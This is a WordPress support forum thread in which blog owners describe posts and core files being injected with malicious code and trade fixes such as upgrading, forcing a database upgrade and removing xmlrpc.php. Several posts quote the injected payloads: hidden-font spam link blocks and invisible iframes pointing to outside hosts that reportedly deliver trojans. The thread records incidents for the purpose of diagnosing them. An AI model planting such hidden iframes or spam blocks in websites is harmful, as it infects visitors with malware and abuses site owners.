iframe injection problem?

@duskglow: excellent work isolating the problem and identifying an instant workaround/fix.

Glad to see that the problem was found and the wordpress folks have released a patch.

I’m sure a couple people here are happy to find out that they really weren’t crazy after all. ??

Thanks

So, if we upgraded to 2.3.2, this is no longer an issue?

Version 2.3.3 and I’m still getting spam injection.

<font style=”position: absolute;overflow: hidden;height: 0;width: 0″>
absorption disposition and elimination of alcohol 1 g zithromax activities for alcohol and drug classes
etc..etc..etc..
</font>

This was mentioned in this thread previously but it seems to have been overlooked. This seems very similar to the iframe injection. It shows up in a post after it’s been published, no modify or edit noticed.

I’m getting code injected into posts on one of my blogs as well, and I just upgraded to 2.3.3 to try and prevent this and it happened again

Same as Fluxinul:

<font style=”position: absolute;overflow: hidden;height: 0;width: 0″><!–4848–><a href=”
100s of spam links
</font>

How do I lock this down?

I found at least part of our problem, it appears that the wordpress db user didn’t have alter privileges on the db. So the db upgrade to 2.3.2 and then 2.3.3 from a very old version, didn’t work completely. It didn’t fail completely either which is something that should be fixed.

We have done a force db upgrade and things are acting fairly normal now, we’ll see how the spam injection goes.

I wrote more about it how to fix this all:
https://www.bontb.com/2008/03/wp-content1-trojan-virus-for-wordpress-bloggers/

I have 2.3.3 and problem is i started seeing logs from sql since march 11th !

now my suggestion also is to remove all users from wp-register if u don’t need them…

having the same sort of problem. i have this which seems like it is implanted in all files.. bummer
<IFRAME src=”https://www.dms-clan.de/vwar/upload/index.html&#8221;
width=”0″ height=”0″ frameborder=”0″></iframe>
<IFRAME src=”https://www.dms-clan.de/vwar/upload/index.html&#8221;
width=”0″ height=”0″ frameborder=”0″></iframe>

plus google has sent this message to me..
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

any ideas anyone on where this is coming from i haven’t got a blog only a guestbook?

Got this one on one of two of my ver 2.3.3 blogs the wp-settings.php file was infected with an iframe injection to some stat.php page. I deleted the code on both sites and upgraded one to 2.5. Now this weekend i find the other blog infected again with the code below.

#iframe src=’https://mystabcounter.info/index2.php&#8217; width=’6′ height=’6′ style=’visibility: hidden;’></iframe#
( i have replaced the brackets with #)

Googling this site suggests it launches drive by malware type trojans.
This time though it was in every wp file in the root of the blog. I downloaded everything including plugins and themes and scanned with a search/replace program to search only for the offending code and only found it in the root files. I have now deleted all wordpress files and upgraded to ver 2.5 on that one. I have other blogs on ver 2.3.3 on same server that seem ok but i will gradually change them over to 2.5 as well.

I notified my host who are looking into it but cant be sure if it was just wordpress as i have basic plugins and no much else that i have used for years, the only change was first 2.3.3 over Xmas on all blogs.

I notified it by checking my feed links on the blog, the injection breaks the feed so and displays the iframe code on the screen (if you use Firefox to view) so i would advise everyone to click around there blog and especially the feed to see if anything looks wrong, also just download your entire website and scan the files with a search/replace program set to search only for iframe code, i used Handytools searchreplace as its nice and simple and easy to just point it at a folder and let it run searching subfolders as well.

Regards

Rob

I have WP 2.5 and no “strange” plugins and got the same injection today… looks like this <!-- Traffic Statistics --> <iframe src=https://xx.xxx.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> and of course it downloads a trojan… my AV told me… still no fix for this?

I read that the best solution is to temporarily remove xmlprc.php from host – I did this.

Will there be a fix to the problem or it will go into the version 2.6 or whatever you call it?

If the problem exists, no one has been able to replicate it or provide logs or other evidence that might give a hint as to the cause.

DraxOfAvalon: did you catch your blog being exploited in your logs? Was your blog a fresh 2.5 install or an upgrade to 2.5 from a previous version?

Alright here is some more information from my end in hopes that it can help things..

I had an issue in the past with the iframe injection into a couple of my blogs (back then I had only about 8), I removed the code and upgraded to the newest version of wordpress. Unfortunately I only documented the code and not the actual sites that it was found on. This was probably 4-6 months ago and since had not had any issues until last week.

Most of my blogs hold position within google for terms that get me sales on a daily basis. At the beginning of last week I noticed a drop in sales, and upon searching on google noticed a link underneath my blog saying “This site may harm your computer”. Upon looking further into it I realized that someone had once again injected code into my posts.

I removed it, upgraded to 2.5, asked google to reanalyze my site, and about 5 days later the link was removed and I was back to business (or so I thought). During this time frame, I upgraded my 170+ wordpress blogs to 2.5 (a MAJOR pain in the butt), and scanned posts on the others to make sure the code had not been injected. After the countless amount of hours spent, I assumed I had solved the issue. Well the past two days I noticed a decrease in my main money making blog, and upon checking google I saw the damn “This site may harm your computer” link again, this time on a new site which had never had it before.

I am positive the code was not there last week when I upgraded to 2.5, and was injected since. Searching around on google I cannot seem to find much information on how to resolve the issue, which is how I happened upon this page. When potential customers click my site, it takes them to a google page warning them, so I essentially lose ALL of my sales during the down time. I am pissed to say the least.

When I went through the sites checking posts and upgrading to 2.5 I notated the ones which had been injected, and going through them the only plugin that they share would be “Google XML Sitemaps by Arne Brachhold”. Could this be the issue? That I have the sitemap files set to CHMOD 666?

So, the blogs which were injected, were upgraded to 2.5 from a previous version of wordpress. I will have to start the time consuming process of manually checking the posts on all 170+ blogs again to see if any others are compromised.

This is costing me a ridiculous amount of money, I would appreciate any input on how I can secure these blogs and resolve the issue, which is why I provided so much. I will check back often so if you have any questions regarding my situation I will happily answer them.

It should also be noted that I do allow both user registrations and comments on these blogs, but require moderation for comments. Had not seen anything fishy when approving comments. Should I turn off user registrations?